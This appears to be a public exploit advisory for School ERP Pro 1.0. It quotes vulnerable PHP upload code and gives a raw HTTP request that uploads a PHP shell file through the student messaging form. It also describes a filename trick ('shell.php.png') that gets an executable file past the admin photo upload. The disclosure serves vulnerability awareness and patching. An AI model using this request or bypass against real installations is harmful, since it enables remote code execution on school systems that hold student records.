School ERP Pro 1.0 Remote Code Execution

2020.04.30
Credit: Besim Altinok
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: School ERP Pro 1.0 - Remote Code Execution # Date: 2020-04-28 # Author: Besim ALTINOK # Vendor Homepage: http://arox.in # Software Link: https://sourceforge.net/projects/school-erp-ultimate/ # Version: latest version # Tested on: Xampp # Credit: ─░smail BOZKURT Description ------------------------------------------- A student can send a message to the admin. Additionally, with this method, the student can upload a PHP file to the system and run code in the system. ------------------------------------ *Vulnerable code - 1: (for student area) - sendmail.inc.php* - Student user can send message to admin with the attachment ------------------------------------ $image_file = basename($_FILES['newimage']['name'][$i]); $ext=explode(".",$_FILES['newimage']['name'][$i]); $str=date("mdY_hms"); //$t=rand(1, 15); $new_thumbname = "$ext[0]".$str.$t.".".$ext[1]; $updir = "images/messagedoc/"; $dest_path = $updir.$new_thumbname; $up_images[$i] = $dest_path; $srcfile = $_FILES['newimage']['tmp_name'][$i]; @move_uploaded_file($srcfile, $dest_path); $ins_arr_prod_images = array( '`es_messagesid`' => $id, '`message_doc`' => $new_thumbname ); $idss=$db->insert("es_message_documents",$ins_arr_prod_images); --------------------------------------------------- *PoC of the Remote Code Execution* --------------------------------------------------- POST /erp/student_staff/index.php?pid=27&action=mailtoadmin HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 *************************** Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/erp/student_staff/index.php?pid=27&action=mailtoadmin Content-Type: multipart/form-data; boundary=---------------------------2104557667975595321153031663 Content-Length: 718 DNT: 1 Connection: close Cookie: PHPSESSID=8a7cca1efcb3ff66502ed010172d497a; expandable=5c Upgrade-Insecure-Requests: 1 -----------------------------2104557667975595321153031663 Content-Disposition: form-data; name="subject" DEDED -----------------------------2104557667975595321153031663 Content-Disposition: form-data; name="message" <p>DEDED</p> -----------------------------2104557667975595321153031663 Content-Disposition: form-data; name="newimage[]"; filename="shell.php" Content-Type: text/php <?php phpinfo(); ?> -----------------------------2104557667975595321153031663 Content-Disposition: form-data; name="filecount[]" 1 -----------------------------2104557667975595321153031663 Content-Disposition: form-data; name="submit_staff" Send -----------------------------2104557667975595321153031663-- ------------------------------------ *Vulnerable code - 2: (for admin area) - pre-editstudent.inc.php* - Admin user can update user profile photo ------------------------------------ if (is_uploaded_file($_FILES['pre_image']['tmp_name'])) { $ext = explode(".",$_FILES['pre_image']['name']); $str = date("mdY_hms"); $new_thumbname = "st_".$str."_".$ext[0].".".$ext[1]; $updir = "images/student_photos/"; $uppath = $updir.$new_thumbname; move_uploaded_file($_FILES['pre_image']['tmp_name'],$uppath); $file = $new_thumbname; ------------------------------------ Bypass Technique: ------------------------------------ $_FILES['pre_image']['name']; --- > shell.php.png $ext = explode(".",$_FILES['pre_image']['name']); --- $new_thumbname = "st_".$str."_".$ext[0].".".$ext[1]; $ext[0] --> shell $ext[1] --> php lastfilename --> st_date_shell.php


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top